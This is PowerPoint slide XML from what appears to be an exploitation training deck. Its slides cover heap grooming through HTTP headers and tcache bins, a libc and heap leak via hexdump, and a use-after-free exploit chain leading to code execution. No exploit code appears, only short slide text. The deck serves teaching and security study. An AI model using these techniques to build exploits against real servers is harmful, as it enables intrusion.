              <a:t>Many Headers = Groomed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69F52DA-497E-4549-B6A0-27A19484FE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="4129781" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add 5+ headers + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds MANY chunks to the smaller TCache bin sizes 🔥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate size with more than one chunk in the bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C546E11-BC28-2842-8AD1-C982842F591A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3622089"/>
            <a:ext cx="9148627" cy="1564273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="TCache Chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96618451-F83B-7D4F-BE2C-EC23AFAC4B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047728" y="417925"/>
            <a:ext cx="1859280" cy="3098800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DA7561-FB3E-4C40-8FAB-3548BCBA12EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403977" y="2482973"/>
            <a:ext cx="129733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4268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C375-7984-A44D-B7B4-67FB60EE2C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leak with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hexdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="LibC and Heap Leak in hexdump">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87708092-12D0-2940-BFA8-F429CFFD9AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245038" y="2322516"/>
            <a:ext cx="8270312" cy="1640104"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9538CB43-BB27-3049-8508-BC55E56F0BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228948" y="2707965"/>
            <a:ext cx="240898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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2C5D49-EF4B-D546-98F0-A7D6240076C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697115" y="3108940"/>
            <a:ext cx="240898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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3E5C0B-71D6-1B4B-B908-A3CE4AB557BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166804" y="3103297"/>
            <a:ext cx="247112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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C37095-617A-BA46-B802-0FEB16F4DDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697115" y="3477639"/>
            <a:ext cx="247112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DC9981-BA72-5A49-9D17-38D23718EBF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726097" y="1742519"/>
            <a:ext cx="2281561" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1922C33-3D68-944C-8AD6-896F1274DFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530136" y="1425935"/>
            <a:ext cx="2281561" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8052DEE6-E028-B049-B5EF-6381CC1520F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204839" y="1742519"/>
            <a:ext cx="133165" cy="173512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118B7B4-07EC-0A4F-A537-26FA2AE71B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351321" y="1742519"/>
            <a:ext cx="1808912" cy="136077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2F10A3-6C6B-DC46-B82C-7713DE4737E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962421" y="2011459"/>
            <a:ext cx="154294" cy="41144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9F69C53-03B3-6941-B406-EA67EC2A3021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4140192" y="2032891"/>
            <a:ext cx="1626920" cy="75934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055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EB65-F039-E804-BB3F-E6C3EB04AB2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AF7071E9-3AEE-2A00-C00C-AA9F1BB12C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find base via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>final.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544061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66D0-C7B7-C244-A27D-085A437B5C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124287" y="841772"/>
            <a:ext cx="8859915" cy="1790700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Exploit Chain - UAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38057F4-E4FE-8547-B43C-F45981B2E7A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + Grooming = code execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27137786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2AA4-E092-7146-BE5D-7A23E9619C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing a Use After Free – 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A3923F-BA97-1FE9-061D-51B0BC66B386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1260872"/>
            <a:ext cx="3868340" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Then Use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99200646-0A80-5348-A937-C3B987AFE004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1878809"/>
            <a:ext cx="4180644" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of this variable afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="New digital tools could speed up Covid-19 contact tracing - STAT">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CA09D9-FC0C-2A48-B0C5-E520D3F8F1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0486" y="1016053"/>
            <a:ext cx="3558055" cy="1992510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Free then Use vuln">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB23D6A-C01C-EF42-BA52-23402D7B9C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="3085268"/>
            <a:ext cx="3768250" cy="1980394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE8C272-142B-4349-8151-5DEBE92254C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="4995920"/>
            <a:ext cx="228389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682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C29B0-1D8E-B04C-92D1-0C10C95226F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP – Body </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E291BD27-1D52-2744-938A-CD52337239E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The DATA being sent in the request – BODY LINE 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D343B14F-E5E6-8847-9552-DDFBD0565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580" b="32677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2571750"/>
            <a:ext cx="8237687" cy="114799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5222F73-F399-BB47-B9A5-77EA72F9E90C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394910" y="3906959"/>
            <a:ext cx="4698347" cy="757843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E1DDDD"/>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dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BODY Line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BODY Line 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4215773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Your Turn to Use After Free!</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0"/>
            <a:ext cx="4797547" cy="3699443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not always a linear code path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding the vulnerability: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call to free </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usage after the free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B635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870" y="1409216"/>
            <a:ext cx="4115638" cy="232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169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B8155-E6F8-6E48-BD78-EA9F8C139B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpret The Incoming Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Interpret all of the headers one by one">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D339DF53-0C9F-F149-8D5F-A67A21987721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
